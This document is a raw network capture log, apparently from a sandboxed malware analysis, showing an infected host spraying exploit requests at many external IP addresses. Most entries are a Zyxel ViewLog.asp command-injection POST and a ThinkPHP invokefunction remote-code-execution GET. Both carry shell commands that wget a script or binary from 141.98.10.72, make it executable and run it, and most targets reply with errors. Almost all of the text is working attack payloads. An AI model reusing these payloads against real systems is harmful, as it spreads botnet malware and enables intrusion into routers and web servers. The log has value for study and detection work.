                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:13.623089075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:16.375042915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:21.751105070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:32.502609968 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:55.030227900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1018192.168.2.154194094.121.48.128080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:11.626446009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1019192.168.2.155624494.122.2.2428080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:11.626777887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1020192.168.2.154984294.120.163.1908080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:11.628370047 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1021192.168.2.1552440112.126.92.4780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:12.841885090 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:13.178937912 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:31:12 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1022192.168.2.153701695.169.188.1780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:13.059075117 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:13.268219948 CET404INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:31:13 GMT
                                                      Server: Apache
                                                      Content-Length: 226
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1023192.168.2.155642095.101.70.2380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:13.059366941 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:13.276622057 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:31:13 GMT
                                                      Date: Wed, 14 Feb 2024 08:31:13 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 64 66 63 31 34 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 37 33 26 23 34 36 3b 64 63 62 63 34 65 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;5dfc1402&#46;1707899473&#46;dcbc4ee</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1024192.168.2.154346295.216.208.20480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:13.060820103 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:13.338419914 CET602INHTTP/1.1 400
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Language: en
                                                      Content-Length: 435
                                                      Date: Wed, 14 Feb 2024 08:31:13 GMT
                                                      Connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 400 Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 Bad Request</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1025192.168.2.153655495.240.204.19480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:13.069494963 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1026192.168.2.154238095.59.5.10280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:13.148528099 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:14.071121931 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:15.927022934 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:19.703172922 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:27.126849890 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:41.974438906 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:32:13.461555004 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1027192.168.2.155262295.170.82.19980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:13.467215061 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:13.668632984 CET339INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Wed, 14 Feb 2024 08:31:13 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1028192.168.2.155288095.217.16.10180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:13.514224052 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:13.742676020 CET115INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/plain; charset=utf-8
                                                      Connection: close
                                                      Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                      Data Ascii: 400 Bad Request


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1029192.168.2.153844695.83.127.15480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:13.699112892 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:15.090053082 CET41INHTTP/1.0 404 File Not Found
                                                      Feb 14, 2024 09:31:15.090904951 CET215INData Raw: 53 65 72 76 65 72 3a 20 61 6c 70 68 61 70 64 0d 0a 44 61 74 65 3a 20 46 72 69 20 46 65 62 20 31 34 20 31 39 3a 35 32 3a 34 35 20 32 30 31 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20
                                                      Data Ascii: Server: alphapdDate: Fri Feb 14 19:52:45 2014Pragma: no-cacheCache-Control: no-cacheContent-type: text/html<html><body><h2>Error: File Not Found</h2><p>File Not Found.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1030192.168.2.155698085.214.116.1458080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.141093969 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:14.361587048 CET1257INHTTP/1.1 404
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Language: de
                                                      Content-Length: 1108
                                                      Date: Wed, 14 Feb 2024 08:31:14 GMT
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 